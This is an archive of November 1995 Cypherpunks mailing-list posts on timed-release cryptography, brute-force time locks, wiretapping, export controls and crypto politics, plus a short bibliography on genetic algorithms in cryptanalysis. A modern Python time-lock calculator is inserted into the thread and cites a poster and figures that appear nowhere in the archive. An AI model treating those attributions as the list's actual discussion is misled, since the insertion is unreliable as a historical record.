Daily/19951109) From shields at tembel.org Sun Nov 12 17:30:50 1995 From: shields at tembel.org (Michael Shields) Date: Mon, 13 Nov 1995 09:30:50 +0800 Subject: expiration dates on cryptography In-Reply-To: Message-ID: <483im9$ja@yage.tembel.org> -----BEGIN PGP SIGNED MESSAGE----- In article , Timothy C. May wrote: > Even the "timed-release cryptography" is NOT a pure cryptographic system, > as the idea of "temporal state" in crypto is iffy. That is, clocks can be > jiggered. Even "sealed clocks" can be jiggered. True "timed-release crypto" isn't possible with pure mathematics, because time never appears in mathematical equations. Time does appear in physical equations, so it's conceivable that a device could be built that really wouldn't divulge a secret for a given length of time. However, I'm not sure how such a device would work, and I'm not sure it would be practical for long periods (longer than a human lifetime). What I'm really proposing is "event-release" crypto based on reputation, with checks and balances so that you can minimize the necessary level of trust and prove breach of contract. I think this is a useful service, because you can convince yourself that in practice, it wouldn't be profitable for the crypto houses to default, nor for an attacker to compromise every house. Once you have event-release crypto, time-release is an easy special case, with zero human interaction and thus fast turnaround and low cost; but "the beginning of the twentyfirst century" is just an event, as is "my death" or "a horse with exactly three vowels in its name wins the 1996 Kentucky Derby". I'm writing code for Tembel's Crypto House now, so I can get an empirical grasp on this.
> "Self-destruct crypto" would work roughly the same way: > > -- N agents holding pieces of puzzle, contracted to destroy those pieces on > such-and-such date. I don't see how this could work, considering that once there are copies of a message in circulation among nontrusted parties it is impossible to destroy the information. Also, it's impossible to verify that an agent has destroyed a message! -- Shields. From bdolan at use.usit.net Sun Nov 12 18:10:42 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 13 Nov 1995 10:10:42 +0800 Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995 In-Reply-To: <199511111547.HAA08706@blob.best.net> Message-ID: On Fri, 10 Nov 1995, James A. Donald wrote: > At 05:15 PM 11/8/95 -0500, ACLUNATL at aol.com wrote: > > According to the government's own statistics, 1,800 innocent conversations > > are intercepted each and every time a wiretap or other form of electronic > > surveillance is placed. > > This seems curiously inefficient, even for government work. Only if the government isn't interested in monitoring the 1,800 innocent conversations. -Brad Dolan, Who was stopped and questioned at a highway "checkpoint" this morning. This was the third time this year. Listen to a few thousand conversations or question a few thousand motorists, and you're bound to find somebody up to something. > --------------------------------------------------------------------- > | > We have the right to defend ourselves | http://www.jim.com/jamesd/ > and our property, because of the kind | > of animals that we are. True law | James A. Donald > derives from this right, not from the | > arbitrary power of the state.
| jamesd at echeque.com > > From markm at omni.voicenet.com Sun Nov 12 18:12:46 1995 From: markm at omni.voicenet.com (Mark M.) Date: Mon, 13 Nov 1995 10:12:46 +0800 Subject: Who needs time vaults anyway? In-Reply-To: Message-ID: On Sat, 11 Nov 1995, Simon Spero wrote: > Depending on how fine grained you want the release to be, you could also > take the inverse of Moore's law, work out how big a key you need to have > it unbreakable in less than the desired time, add in whatever fudge > factors you feel like based on how much it would be worth to the opponent > to get early access, then lock up the secret and throw away the key. > > Simon > The main problem I would see with this scheme is that it uses Moore's law. I do not think that Moore's law will hold true forever. Microchips are becoming so small that they will eventually reach a point where they will not be able to be any smaller without facing quantum uncertainty. At this point, either the increase in computer speed will stop or something like parallel processing or quantum computers will become feasible and the amount of compute time will be very little. Using this type of scheme might be useful now, but most likely, a new law about increasing computer power will have to be developed in the next twenty years. -- `finger -l markm at omni.voicenet.com` for public key and Geek Code Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47 20 54 FA 56 00 22 58 D5 Homepage URL:http://www.voicenet.com/~markm/ From nobody at valhalla.phoenix.net Sun Nov 12 18:26:26 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Mon, 13 Nov 1995 10:26:26 +0800 Subject: "conspiracypunks" Message-ID: <199511111515.JAA27130@ valhalla.phoenix.net> May have been silenced, but the Slick criminality story continues apace, and it's fitting that the most Nixonian president since Tricky himself should have a "Deep Throat," no matter how some of you feel about Orlin, who is, BTW, doing the job the media claims to be responsible for.
[Don't Flame C2] From rah at shipwright.com Sun Nov 12 18:26:48 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 13 Nov 1995 10:26:48 +0800 Subject: DejaNews all over again Message-ID: > Jeff, I think it's in your best interest to not waste your time >responding to this moron (who bears many features in common with >Detweiler) Except for his esteemed "credentials", of course... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From shields at tembel.org Sun Nov 12 18:35:27 1995 From: shields at tembel.org (Michael Shields) Date: Mon, 13 Nov 1995 10:35:27 +0800 Subject: Timed-release crypto and information economics In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us> Message-ID: <483a87$u5k@yage.tembel.org> In article <199511091852.NAA01172 at bioanalytical.com>, Beavis B. Thoopit wrote: > initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23' > do forever /* actually until the plaintext spews out */ > sleep 1 unit > for each element in the buffer > buffer[ element ] = magictransform( buffer[ element ] ) But the "sleep one unit" part is vulnerable, unless (a) the whole device is physically armored, which is probably not easier than armoring a memory chip; or (b) the process -- the whole device, not just a clock -- is based on some basic principle of physics that has time in the equation. -- Shields. 
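The brute-force time lock debated in the "Who needs time vaults anyway?" thread can be put in numbers. The following is an added example, not code from any poster: it sizes a key by the inverse of Moore's law, as Simon Spero suggests, and computes the chance of an early unlock, which is Dan Oelke's objection. The attacker's starting rate of 10^6 keys/s and the 1.5-year doubling period are assumptions chosen for illustration.

```python
"""Brute-force "time lock": how big a key, and how likely is an early unlock?

Assumptions (not from the thread): the attacker starts at RATE0 keys/s and,
under the Moore's-law model, doubles that rate every DOUBLING_YEARS.
"""
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600
RATE0 = 1e6            # assumed attacker speed today, keys per second
DOUBLING_YEARS = 1.5   # assumed doubling period of the attacker's speed


def keys_searched(t_years, rate0=RATE0, doubling_years=None):
    """Keys tried after t_years; doubling_years=None means constant speed."""
    if t_years <= 0:
        return 0.0
    per_year = rate0 * SECONDS_PER_YEAR
    if doubling_years is None:
        return per_year * t_years
    # Integral of per_year * 2**(t/d) dt from 0 to t_years.
    growth = 2 ** (t_years / doubling_years) - 1
    return per_year * doubling_years / math.log(2) * growth


def key_bits_for_lock(target_years, rate0=RATE0, doubling_years=None):
    """Smallest key length whose full keyspace outlasts target_years of search."""
    return math.ceil(math.log2(keys_searched(target_years, rate0, doubling_years)))


def p_found_by(t_years, keyspace, rate0=RATE0, doubling_years=None):
    """Chance the key has been hit by t_years (key uniform over the keyspace)."""
    return min(1.0, keys_searched(t_years, rate0, doubling_years) / keyspace)


def years_until(p, keyspace, rate0=RATE0, doubling_years=None):
    """Inverse of p_found_by: years until the success chance reaches p."""
    per_year = rate0 * SECONDS_PER_YEAR
    if doubling_years is None:
        return p * keyspace / per_year
    scale = per_year * doubling_years / math.log(2)
    return doubling_years * math.log2(1 + p * keyspace / scale)


def report(target_years=10):
    """Compare both attacker models for a lock meant to last target_years."""
    rows = []
    for label, d in (("constant speed", None), ("Moore's law", DOUBLING_YEARS)):
        # Keyspace that the attacker exhausts exactly at target_years.
        keyspace = keys_searched(target_years, RATE0, d)
        rows.append({
            "model": label,
            "key_bits": key_bits_for_lock(target_years, RATE0, d),
            "p_1y": p_found_by(1, keyspace, RATE0, d),
            "p_half": p_found_by(target_years / 2, keyspace, RATE0, d),
            "median_years": years_until(0.5, keyspace, RATE0, d),
        })
    return rows


if __name__ == "__main__":
    for r in report():
        print(f"{r['model']:>14}: {r['key_bits']} bits, "
              f"P(1y)={r['p_1y']:.4f}, P(5y)={r['p_half']:.4f}, "
              f"median={r['median_years']:.2f} years")
```

With constant attacker speed the figures match the 50% at 5 years and 10% at 1 year quoted in the thread. With the assumed doubling, most of the keyspace is covered in the last few years, so the median unlock moves later, yet the unlock date remains a distribution rather than a fixed time.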
From sameer at c2.org Sun Nov 12 19:41:29 1995 From: sameer at c2.org (sameer) Date: Mon, 13 Nov 1995 11:41:29 +0800 Subject: POTP Security In-Reply-To: <9511120717.AA25332@doom> Message-ID: <199511121045.CAA17461@infinity.c2.org> Anything calling itself a one-time-pad which isn't, imo should not be trusted, even if r, s, a, d, h, (and everyone else) said the algorithm was great. > > > > On 11 10 95 jgrubs at left.webcasters.com inquired about POTP > > security: > > > > What level of security does this cute, little puppy provide??? > > > > > > One approach to answering that inquiry is an excerpt from: > > > > Date: Sat, 21 OCT 95 10:58:51 -0500 > > From: Paul Jackman > > Newgroups: talk.politics.crypto > > Subject: Re: Elementrix One-Time Pad > > > > > > ...mine [Jackman's background and experience] goes back to 1961 > > as Crypto Communications Control Command Center Supervisor for > > the National Security Agency (NSA), and US Army Intelligence Se- > > curity. Even so, I do not consider myself expert in either the > > technical sense or the historical sense. But, I know enough not > > to comment on algorithms that I don't have access to. > > > > The algorithm will be published when patent protection is assured. > > It is currently patent pending in several countries. > > > > As far as marketing goes, this product is not going to disappear. > > We have been premarketing security technology for four years through > > beta, and one year in pilot with international Fortune 100 companies. > > The initial presentations on Internet about a year ago showed us that > > the newness and complexity of the Algorithm had to be presented > > one on one to the experts which Elementrix has done. There is a > > long parade of companies that have implemented this technology but > > do not wish to be named, (Typical of any security implementation.
> > Those who do acknowledge the integrity of the products are noteworthy, > > Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mer- > > gent, and there will be many more. > > Also noteworthy are those who have examined the product under NDA and > declined to give an endorsement. > > > -- > Mark Chen > chen at intuit.com > 415/329-6913 > finger for PGP public key > D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From ses at tipper.oit.unc.edu Sun Nov 12 19:56:20 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 13 Nov 1995 11:56:20 +0800 Subject: Yvette In-Reply-To: <199511101201.MAA00215@gears.efn.org> Message-ID: On Fri, 10 Nov 1995 an237621 at anon.penet.fi wrote: > : tony266 at vabeach.email.net allegedly wrote: > : I'm wondering if Yvette from Smithfield, Va is as fine as most people say she > : is... > Yes, there is a cow on the lawn. Y vette when you can have it now. From adam at lighthouse.homeport.org Sun Nov 12 20:05:47 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Mon, 13 Nov 1995 12:05:47 +0800 Subject: Market Value of Web Pages In-Reply-To: <199511130035.AA32505@junkers.lochard.com.au> Message-ID: <199511130352.WAA02006@homeport.org> The point is that Microsoft Word doesn't have an 'encrypt' button in the 'save' dialog. This means that almost nothing gets encrypted. The NSA likes this, and keeps the ITARs around. (Someone might point out that this is why Colonel Bat Guano's laptop had military secrets on it in plaintext when stolen out of his car in the gulf war.) Adam Mark wrote: | Off topic: | Personally I don't see the relevance of ITAR and crypto any more. When was the | last time any one was prosecuted under its statutes? What is the point of | banning exportation of software which is widely available outside the US | anyway?
It's idiocy. Any foreign power or cartel wanting secure comms is not -- "It is seldom that liberty of any kind is lost all at once." -Hume From enzo at ima.com Sun Nov 12 20:33:10 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Mon, 13 Nov 1995 12:33:10 +0800 Subject: Pegasus Mail 2.20 In-Reply-To: <199511090804.CAA20494@ion1.ionet.net> Message-ID: On Thu, 9 Nov 1995, Scott Staedeli wrote: [David Harris:] [...] > will define an open interface for third-party encryptors and it is then > up to other people to write the code. What I envisage actually happening > is people writing "shell interfaces" for WinPMail - i.e., modules that > take the calls I make and translate them into calls to other programs, > such as PGP or whatever, returning the result. Is anybody currently writing modules for PGP (or, less trivially, for MOSS, S/MIME etc.)? I've had a look at the interface and it doesn't seem difficult, but why re-invent the wheel? :-) The real question for PGP, actually, is which scheme should be supported to achieve MIME compatibility among the several proposed in the IETF drafts. From anonymous-remailer at shell.portal.com Sun Nov 12 20:58:17 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 13 Nov 1995 12:58:17 +0800 Subject: Market Value of Web Pages Message-ID: <199511130435.UAA08914@jobe.shell.portal.com> On Thu, 9 Nov 1995, Timothy C. May wrote: > At 6:51 PM 11/9/95, Bill Frantz wrote: > > >BTW - I don't think we should be talking about a penny/page cost because it > >is way too high for the current market. For example, my copy of Applied > >Cryptography V2 cost about $.067/page AND came with the media to keep it > >"forever". My (used) copy of Snow Crash cost closer to a penny/page and > >also came with the media. I would think that somewhere between 1/100 to > >1/10 of a penny/page is closer to the current market value of the page > >content. 
> > With all due respect to Bill--his mention of agorics tells me he knows > something about computational ecologies and markets--, there is no > reasonable way to say what price is "closer to the current market value of > the page content," except by what the market will bear! > > Yes, a paperback novel is a penny a page or so. But a 5-page consultant's > report that sells for $2000 has a "market value" to someone of $400 a page. > You can all think of all kinds of other examples. Actually, Tim, there are many examples we each could think of. As an example, I'm presently preparing an unsolicited Security Review report for a Fortune 500 company. It's *priced* if you will in the mid five figure range per page (and that includes the title page, the appendices, and the pages which say on them, "this page left intentionally blank"). (It's the short report ... the one which references RFC's rather than including them. The report that includes RFC's is priced significantly lower when measured by weight ... i.e. cost/page metering.) But the report's information value is truly *worth* a factor many, many hundreds of times what the invoice rate bears or what the cost per page would indicate. For me, my current report is in fact a loss leader. Since my report IS unsolicited, I really don't even have any real expectation that the invoice will be approved for payment. My invoice is not submitted on that basis. I realize that I might not even receive re-imbursement for my out-of-pocket expenses. The beneficiary might well think that the information is only worth the value of a promotional mug or of a promo T-shirt, or maybe even worthless. Alternatively, the company might offer a complementary copy of their product or even just info-freeload as Netscape did with those Berkeley hombre stud-muffins, some time ago. 
But the information within my unsolicited report is hopefully utilized none the less, no matter what financial consideration is extended, because the information is _actually_ priceless, even though the recipient might consider that information to have only a nominal or "no, or little compensable value". Information is interesting that way. Because information is/was provided to them "freely" most firms will not (generally) see any value in the information at all. They happily become information free-loaders. It's paradoxical and ironic in an information age. The huge bill I send out is, literally, the reality check. No honest person would expect to take a dress home from a shop without paying, but a lot of normally honest folk don't give a thought to taking an armload of free information. Which I guess is an interesting segue into a basic briefing on "information value" theory. But that part will have to hold for a bit ... once I collect my thoughts on how information philistines and information connoisseurs have differing value judgments. The implications might surprise people. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From A.Back at exeter.ac.uk Sun Nov 12 21:16:28 1995 From: A.Back at exeter.ac.uk (A.Back at exeter.ac.uk) Date: Mon, 13 Nov 1995 13:16:28 +0800 Subject: Who needs time vaults anyway? In-Reply-To: <199511110843.AAA18344@infinity.c2.org> Message-ID: <13530.199511112217@olib> > > Can anyone explain what use this theoretical "time-sensitive" crypto > > box would be good for? > > Suppose you die. Suppose you get "silenced", or carted off by big brother for thought crime. A defense: if you try to silence me, this info gets plastered all over the net. Suppose you discovered a polynomial time factoring algorithm (dream on:-), and wanted to sell it to the highest bidder - what odds that the NSA would try to obtain it and silence you?
Time-release would be useful for such things. Adam From jya at pipeline.com Sun Nov 12 21:31:36 1995 From: jya at pipeline.com (John Young) Date: Mon, 13 Nov 1995 13:31:36 +0800 Subject: YOU_luz Message-ID: <199511101431.JAA26270@pipe3.nyc.pipeline.com> A gruel of high-tech privacy ghoulisms: Nov 4 Economist on burgeoning health services by "outsiders" like defense firms in which lucrative data banks on patients' rotting carcasses are abuilding for resale. Nov 9 W$J on a conference tut-tutting data banking of citizens' repulsive life styles. Nov 9 Financial Times on British Gov smarmily smart "transaction cards" banking citizens' pathetic fears. YOU_luz (19 kb) From jamesd at echeque.com Sun Nov 12 21:41:41 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 13 Nov 1995 13:41:41 +0800 Subject: "Industry Group Rebuffs U.S. on Encryption" Message-ID: <199511130522.VAA09142@blob.best.net> At 09:04 PM 11/12/95 -0500, Duncan Frissell wrote: > There were no nation states or cops prior to 1600. > It is perfectly possible that there will be no nation > states or cops at some point in the future. To be strictly correct, there were no cops in the english speaking world from the time of the saxon invasions to the nineteenth century. There were however the functional equivalent of cops at some places, and some times -- mostly in societies that collapsed or sank into utter tyranny. One can reasonably argue that the persians and scythians etc were nation states, and that sometimes nation states existed during the dark ages and medieval period, but until fairly recently, most of what we now call western civilization regarded what we would now call a nation state as a rare, curious, and pathological aberration. I expect that we will soon once again regard them as pathological, and I hope that we will be able to regard them as rare. 
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From stewarts at ix.netcom.com Sun Nov 12 22:12:40 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 13 Nov 1995 14:12:40 +0800 Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995 Message-ID: <199511130552.VAA16515@ix2.ix.netcom.com> >> > According to the government's own statistics, 1,800 innocent conversations >> > are intercepted each and every time a wiretap or other form of electronic >> > surveillance is placed. >> This seems curiously inefficient, even for government work. There was a discussion on the radio the other day that indicated that some drug dealers really _are_ encoding data on their phones - though Clipper won't help at all. The author was talking about hanging out with undercover drug agents while doing research on a book about the Mob or drug dealers or whatever. He and the cop were in a bar where a bunch of high-level dealers were hanging out; many of them were on their cellphones having conversations about "The 'patio furniture' you ordered is here. We can get you the 'three tables' on Tuesday; would you like a couple of 'chairs' with them also?" :-) The dealers weren't bothered by the cops being there; their lawyers were over at the next table in case they were needed. 
#-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From nobody at REPLAY.COM Sun Nov 12 22:27:39 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 13 Nov 1995 14:27:39 +0800 Subject: Gingrich, "crypto coalition" [*PURE* NOISE] Message-ID: <199511130558.GAA12778@utopia.hacktic.nl> VZNuri: > but my main point in writing was that I thought I would highlight this > phrase given to us by A.Nonymous: the "crypto coalition". > or it might be called the "computer coalition". I think I see a few > faint glimmerings of a new political movement, potentially. > the recent Washington Times editorial on the Exon pornography law, > encryption, and the superiority of allowing people to develop tools > to screen what they don't want to so, could be considered a > portrayal of some of the key philosophies. I see the flames of a bunch of brats with a lot of disposable income, and a sysop culture armed with buckets of water they'd rather not use lest it short out their technocratic "ethics." > its very interesting to contemplate that the online crowd could become > a more well-organized political coalition that has influence in politics. > its clear to me this is happening weakly and informally at the moment. > (i.e. people on the internet having similar philosophies, hence voting > with the same aims, although not organizing to do so yet). > a key ingredient I see working against this: Point-and-click organizing and killfile absorption of discourse. Harrumph. > the "coalition" has a lot of libertarian sentiments, and libertarians > tend to be anti-government and almost disdainful of even participating > in politics. In GROUP politics. Libertarianism is recursively structured: "when there's no gubmint" -- I ain't holding my breath -- they won't trust themselves. 
> one might differentiate between cybernauts who are interested in reforming > our government and using the Net as a tool to do so, such as Jim Warren, and > people at the opposite end of the spectrum of "participation" such as > TCM, who seem to advocate that political battles be simply rejected > or ignored as irrelevant to the future of "cryptoanarchy". (although recent > noises of his I quoted were distinctly uncharacteristic.) To paraquote one of my favorite lesbians, a meme is a meme is a meme is a meme is a meme. The idea that memes will change the world is very typical of our era, which is to say very naive. Warren works, TCM plays; Warren works, and TCM -- who, it's abundantly clear, is brilliant in his own way -- gambles: gambles that the memes he's "trademarked" might pan out. > if anyone is going to have influence in politics, it would be the former > type. but at least in the places in cyberspace where I hang out, I tend > to see more of the latter type: extremist libertarians who almost seem > to suggest that government is inherently unclean and dirty, no matter > what form it takes. I think these are the types that would hate a > government and advocate disenfranchisement with it no matter what > direction it took, even if a libertarian was > elected to a powerful office. (its an interesting question to contemplate). Not really: libbies would rather play a low-stakes game with their own back yard than a high-stakes game with society, in which everyone is in each others' back yard. > it seems to me to be largely a philosophy of alienation bordering > on nihilism. Yes. > now, I have been trashed in public for this position before, but the > philosophy of "us vs. them" applied to government in my opinion is the > wrong paradigm and only contributing to the problems, imho. an organized > "cyberspace coalition" could have tremendous political power to the point > that all the key annoying laws (such as the Itar etc.) 
actually become > election issues brought into mainstream consciousness. the editorials > I have seen about the Exon amendment etc. are steps in those directions. Trashed *as a tentacle*. Crypto as a litmus test isn't interesting: crypto is a means to an end. What is that end? For too many, it is "antigovernment" -- that is, reactionary. > I've seen TCM argue on this list against this, such that we should just > give up on telling congress what is important to us etc. it was a position > that was not unanimous, and in fact quite controversial however, and > remarkably PM once argued against it. (heh. love the fireworks on this list. > they are quite unpredictable at times). Perry has grime under his fingernails. Perry works, works with other people toward definable ends: Perry is, among other things, a craftsman. And if I'm not mistaken, he lives in a place where he gets to see how many people live, and how they live together; this is very different from *choosing to* live where and how TCM does. (Is this a "scurrilous attack," in TCM's words? Or is it just the expression of an opinion? Dr. Fred may be an oaf, but the *reaction* to him demonstrates just how stupid it is to say anything that doesn't toe the line on *this* list, despite all the I-and-thou mumbojumbo.) > I'm all for replacing a dysfunctional government. but people here seem > to advocate that this happens automatically when one has certain > technology. "Replacing" is a participle: what is the agent? If the agent is an individual, or an alienated mass of individuals, it will not be able to replace the govt; if, OTOH, it's a mass of ORGANIZED individuals, it is no longer libertarian. > there is a whole other approach to "cryptoanarchy" that no one here > has ever suggested, but which could be tremendously effective: "infiltrate" > political positions with people sympathetic to that philosophy, and work > to change the entire structure toward it. 
"infiltrate" is a scary word, > but IMHO nothing any different than demopublicans appointing demopublicans > to office would be going on. This is crypto-anarchy, with "crypto-" meaning what it does to most of the pople who use it: X passing as Y, a crypto-fascist for example. And "infiltrate" is nothing more than a fancy word for working within the system, namely, reformism. > a very interesting, key quote by someone here went to the effect: "if > TCM is right, nothing the government does matters. if TCM is wrong, > nothing we do matters". a fascinating psychological justification for > a sort of nihilism. but at the root of it is a kind of laziness and > hostility to organization or groups in any form, IMHO. Yes: this hostility to organization is an old thread in American culture. Its usually associated with antiurbanism, anticosmopolitanism, things like that, but most libbies I've ever met (which is a lot) are mnore anti-control than pro-freedom. You do the math. > in fact the libertarian extremists here seem not only to hate government, > they seem to hate the whole idea of groups accomplishing things, about > the idea of groups coming to consensus. this is a quite remarkably > cynical ideology. Cynical? How about naive? > I'm going to make a prediction: I think the people who are interested > in organizing the "cyberspace coalition" are starting to come together > right now, and that over the long run, this entity will be far more > beneficial in advancing a better reality through cyberspatial technology > than all the people who advocate disillusion, antagonism, resentment, > and nonparticipation in groups and government, to the point the latter > approach will be generally discredited. in other words, we have a powerful > system that can be changed from the inside instead of abandoning it. 
at the > moment, I've not seen any proof that a dedicated group couldn't reform it from > the inside, only a lot of cynical conventional wisdom that such a thing > is inherently impossible and useless to try. If you haven't seen any proof that it can't be reformed, then you haven't looked at the piechart on the back of the 1040 booklet. > the comment I quoted displays the conventional wisdom on this list, > that the encryption issue is "us vs. them", "people vs. the government", > etc. what would A.Nonymous say if someone who was elected began to > embrace the position that encryption is a right? I'm sure he would find > some new reason to be disillusioned with government. that's the position > of radical libertarians. no matter what form government takes, no matter > who is driving it, they hate it. "Encryption is a right" reveals that crypto-libbies are honkey-man analogs of PC creeps: everything is a right. > the first lesson for radical libertarians bordering on anarchists > that love this list is not that Oppressive Government is the problem, but > that Government Is Always Bogus. a rather infantile philosophy that reminds > me of the way children defy authority or structure merely because it > is an authority or a structure, not because of any particular disagreements > they have with the underlying philosophy it expresses. (or rather, they > manufacture the disagreement with the philosophy as required, such that > the reasoning is, if an authority stands for [x], then I am against [x], and > against that authority). Yes. > and this is precisely the dysfunctional > philosophy to life I am referring to that I think will be discredited in > the long run as intellectually vacuous and actual counterproductive to > any kind of progress. Yes. > from what I have seen of Gingrich, he might be a potential leader of this > kind of "computer coalition". 
he is the congressman who has taken stands > on encryption issues and other key cyberspace issues that seem to suggest > an internal awareness of constitutional rights superseding momentarily- > politically-fashionable government legislative whims. of course I'm > putting on my flameproof longjohns as I say that. Don't bother putting anything on. He's a tool, a chump to his own megalomania: I'd love to see that pussy get elected. The moment someone sneezed, he'd set up a howl louder than a cat with a firecracker up its butt. He's just as snively as anyone else these days. From bdavis at thepoint.net Sun Nov 12 22:30:50 1995 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 13 Nov 1995 14:30:50 +0800 Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995 In-Reply-To: <199511130552.VAA16515@ix2.ix.netcom.com> Message-ID: On Sun, 12 Nov 1995, Bill Stewart wrote: > >> > According to the government's own statistics, 1,800 innocent conversations > >> > are intercepted each and every time a wiretap or other form of electronic > >> > surveillance is placed. > >> This seems curiously inefficient, even for government work. > > There was a discussion on the radio the other day that indicated that > some drug dealers really _are_ encoding data on their phones - though > Clipper won't help at all. The author was talking about hanging out with > undercover drug agents while doing research on a book about the Mob or drug > dealers or whatever. He and the cop were in a bar where a bunch of > high-level dealers were hanging out; many of them were on their cellphones > having conversations about "The 'patio furniture' you ordered is here. > We can get you the 'three tables' on Tuesday; would you like a couple of > 'chairs' with them also?" :-) The dealers weren't bothered by the cops > being there; their lawyers were over at the next table in case they were needed. 
This kind of "coded" talk is frequent in drug cases and is generally easy to break -- and to prove what the words meant to the jury. It can even have an unintended probative effect if the defense doesn't put on some evidence to support the "patio furniture," or whatever, story. EBD > #-- > # Thanks; Bill > # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com > # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From stewarts at ix.netcom.com Sun Nov 12 22:34:23 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 13 Nov 1995 14:34:23 +0800 Subject: Who needs time vaults anyway? Message-ID: <199511130613.WAA12515@ix7.ix.netcom.com> At 01:15 PM 11/11/95 -0800, Simon Spero wrote: >As for real time-release - how about just using conventional encryption, >and require it to be brute-forced? ..... Moore's law ..... Moore's law is really unpredictable - you can't be sure if the rate of increase will go up or down, which could affect brute-force time by a factor of 1000 pretty easily, especially if it suddenly becomes convenient to do something your crypto-algorithm happens to use. Also, there's a cost problem - a large brute-force project which requires N years to crack either needs to be ferociously expensive, or else it's easy for somebody to put a bunch of machines together to crack it faster. For anything that requires that level of paranoia, Moore's law probably makes the timing too unpredictable. It probably makes a lot more sense to just do contractual solutions, with secret-sharing protocols to minimize the effects of cheating, bankrupt service providers, and accidents. 
#-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From wfgodot at iquest.com Sun Nov 12 23:45:44 1995 From: wfgodot at iquest.com (Michael Pierson) Date: Mon, 13 Nov 1995 15:45:44 +0800 Subject: coding and nnet's In-Reply-To: <951110141713_18585763@mail04.mail.aol.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <951110141713_18585763 at mail04.mail.aol.com>, Atp3000 wrote: >cypherpunks! >I just recently got interested in coding and cryptography, and I was >wondering if you could suggest 3 or 4 papers that address the application >of neural networks in cryptography. I just grepped through "Abstracts in Cryptology" back to 1980 and "Computer and Communications Security Reviews" up until September 1994 searching for the terms "neural" and "genetic." The results below show no evidence of research into the use of neural networks applied to problems of cryptanalysis (in contrast to genetic algorithms). They do however indicate their potential utility in such areas as transaction and traffic analysis, as well as some types of biometric identity authentication. I wouldn't be surprised to learn of somebody like FinCEN using neural-net systems to do pattern analysis on funds transfers and the like, or the NRO or NSA investing research money into investigating the usefulness of NNs for image processing or for scanning raw ELINT, SIGINT or COMINT data. In fact, I'd be quite surprised if they weren't. While NNs may not be of direct relevance to cryptanalysis, I suspect they are, or will be, of great relevance to the task of identifying what communications should be cryptanalyzed or otherwise scrutinized. Especially given the high volume of traffic our 'thinkpol' aspire to be able to listen to.
`The use of genetic algorithms in cryptanalysis' RA Matthews, Cryptologia v 17 no 2 (April 93) pp 187 - 201 The author presents a genetic system for solving simple transpositions. Candidate column orders are assessed for fitness using digram frequencies, and the best of them are used to breed a new generation of candidates, using column rotations and swaps as mutation operators. The algorithm was useful at finding partial anagrams to aid manual solution. `Use of a genetic algorithm in the cryptanalysis of simple substitution ciphers' R Spillman, M Janssen, B Nelson, M Kepner, Cryptologia v 17 no 1 (Jan 93) pp 31 - 44 The authors report using a genetic algorithm to solve monoalphabetic substitutions. Randomly chosen keys were evaluated for fitness using letter and digram frequencies, and the fittest candidates were then `mated' and subjected to mutation to provide the next generation of keys. The `mating' operation used a selective crossover, in which the `best' character of each key was passed on. `Tearing up the rules' P Sampson, Banking Technology (Nov 93) pp 26 - 30 Mellon Bank has installed a neural-net-based monitoring system which checks card transactions every two hours and looks for abnormal activity. It is claimed to be substantially more effective than rule-based systems. `Cryptanalysis of knapsack ciphers using genetic algorithms' R Spillman, Cryptologia v XVII no 4 (Oct 93) pp 367 - 377 The author describes the design and use of a genetic algorithm to attack small trapdoor knapsacks and gives performance data to show that it functions 50 - 100 times faster than exhaustive search. `Neural networks: the way forward?' R Martin, Cards International no 99 (9/12/93) p 9 Neural networks are in use to detect abnormal card transactions in Mellon Bank and the Eurocard Netherlands network, and both claimed that the system would pay for itself in 1-2 years.
